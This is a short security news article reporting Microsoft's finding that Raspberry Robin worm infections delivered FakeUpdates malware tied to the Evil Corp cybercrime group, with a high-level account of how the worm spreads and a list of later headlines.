1 August 2022

Raspberry Robin malware linked to Russian cybercrime syndicate Evil Corps


Raspberry Robin malware linked to Russian cybercrime syndicate Evil Corps

Microsoft’s cybersecurity team has found a potential connection between the recent Raspberry Robin malware attacks and Evil Corp, an infamous Russia-linked cybercrime syndicate sanctioned by the US government.

In an update to its May write-up on the ransomware-as-a-service RaaS) industry Microsoft said that an access broker it tracks as DEV-0206 has been observed using malvertising to trick victims into downloading a loader for additional malware previously linked to Evil Corps tracked by the tech giant as DEV-0243.

Microsoft said that it discovered the FakeUpdates malware (SocGholish) being delivered via existing Raspberry Robin infections on July 26.

“The DEV-0206-associated FakeUpdates activity on affected systems has since led to follow-on actions resembling DEV-0243 pre-ransomware behavior,” the company noted in the report.

Raspberry Robin (aka QNAP Worm) was first spotted in September 2021 by researchers at cybersecurity firm Red Canary. The malware spreads via infected USB devices in a form of .LNK file and relies on msiexec.exe to call out to its infrastructure, often compromised QNAP devices. It was also observed using TOR exit nodes as additional command and control (C2) infrastructure. Red Canaty noted at the time that questions remain unanswered on the cluster’s later-stage activity and goals of these campaigns.

Last month, Microsoft warned its customers about the Raspberry Robin Windows worm found in the networks of hundreds of organizations including those in the technology and manufacturing sectors.

Back to the list

Latest Posts

Free VPN apps on Google Play turned Android devices into residential proxies

Free VPN apps on Google Play turned Android devices into residential proxies

The threat actor behind this scheme profits by selling access to the residential proxy network to third parties.
28 March 2024
Cyber spies strike Indian government and energy sectors

Cyber spies strike Indian government and energy sectors

The operation involved phishing emails delivering the HackBrowserData info-stealer.
28 March 2024
Spyware makers and state-backed hackers are primary culprits behind rise in zero-day exploits, Google says

Spyware makers and state-backed hackers are primary culprits behind rise in zero-day exploits, Google says

97 zero-day flaws were exploited in-the-wild in 2023, marking an increase of over 50% compared to 2022.
27 March 2024